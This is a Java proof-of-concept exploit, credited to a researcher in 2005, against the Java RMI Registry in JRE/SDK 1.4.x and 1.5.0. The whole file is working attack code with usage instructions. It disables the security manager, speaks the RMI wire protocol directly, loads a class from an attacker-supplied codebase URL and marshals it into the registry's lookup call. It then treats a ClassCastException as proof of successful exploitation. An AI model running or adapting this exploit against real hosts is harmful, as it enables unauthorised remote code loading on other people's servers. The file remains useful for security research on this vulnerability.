/*## (c) adam.gowdiak@gmail.com aug 2005 poland                              #*/
/*##                                                                         #*/
/*## RMIRegistry for JRE/SDK 1.4.x 1.5.0                                     #*/
/*## usage: addr port codebase                                               #*/
/*##                                                                         #*/
/*## the code connects to remote registry running on addr:port and invokes   #*/
/*## its lookup method with an object of a Dummy class of which definition   #*/
/*## is obtained from the URL denoted by a codebase argument                 #*/

import java.lang.*;
import java.lang.reflect.*;
import java.io.*;
import java.net.*;
import java.rmi.server.*;
import sun.rmi.server.*;

public class RMIRegistry {
 
 public static final long   IF_HASH=0x44154dc9d4e63bdfL;
 public static final int    OPNUM=2;

 public static void main(String args[]) {
  String host,urlcodebase;
  int port;

  if (args.length!=3) {
   System.err.println("usage: RMIRegistry addr port codebase");
   System.exit(1);
  }

  try {
   host=args[0];
   port=Integer.parseInt(args[1]);
   urlcodebase=args[2];

   System.setSecurityManager(null);

   /* connect to the given host and portname                         */
   Socket sck=new Socket(host,port);

   /* initialize input/output streams over socket conection          */
   BufferedOutputStream bos=new BufferedOutputStream(sck.getOutputStream());
   DataOutputStream out=new DataOutputStream(bos);

   BufferedInputStream bis=new BufferedInputStream(sck.getInputStream());
   DataInputStream in=new DataInputStream(bis);

   /* write RMI protocol header to the stream                        */
   out.writeInt(0x4a524d49);
   out.writeShort(0x02);
   out.writeByte(0x4c);
   out.flush();

   /* write RMI data for call operation and params                   */
   out.writeByte(0x50);

   MarshalOutputStream objout=new MarshalOutputStream(out);

   objout.writeLong(0);
   objout.writeInt(0);
   objout.writeLong(0);
   objout.writeShort(0);

   /* this is the call to RegistryImpl and its lookup method         */
   objout.writeInt(OPNUM);
   objout.writeLong(IF_HASH);

   /* get Dummy class definition from the given URL codebase         */
   URL urltab[]=new URL[1];
   urltab[0]=new URL(urlcodebase);
   URLClassLoader ucl=URLClassLoader.newInstance(urltab,null);
   Class c=ucl.loadClass("Dummy");

   /* create Dummy class instance through non-exploit constructor    */
   Class ctab[]=new Class[1];
   ctab[0]=Integer.TYPE;

   Constructor con=c.getConstructor(ctab);

   Object otab[]=new Object[1];
   otab[0]=new Integer(0);

   Object o=con.newInstance(otab);

   /* write Dummy object to the MarshalOutputStream                  */
   objout.writeObject(o);

   objout.flush();

   /* read the result of the RMI call                                */
   byte result=in.readByte();

   MarshalInputStream objin=new MarshalInputStream(in);

   byte b=objin.readByte();
   UID.read(objin);

   /* we expect either ClassNotFoundException or ClassCastException  */
   /* being thrown in a result of our call, but this is the latter   */
   /* one which indicates successfull exploitation                   */
   Throwable t=(Throwable)objin.readObject();

   if (t instanceof ClassCastException) {
    System.out.println("RMI call done successfully!");
   } else t.printStackTrace();

  } catch (Throwable t) {t.printStackTrace();}
 } 

}

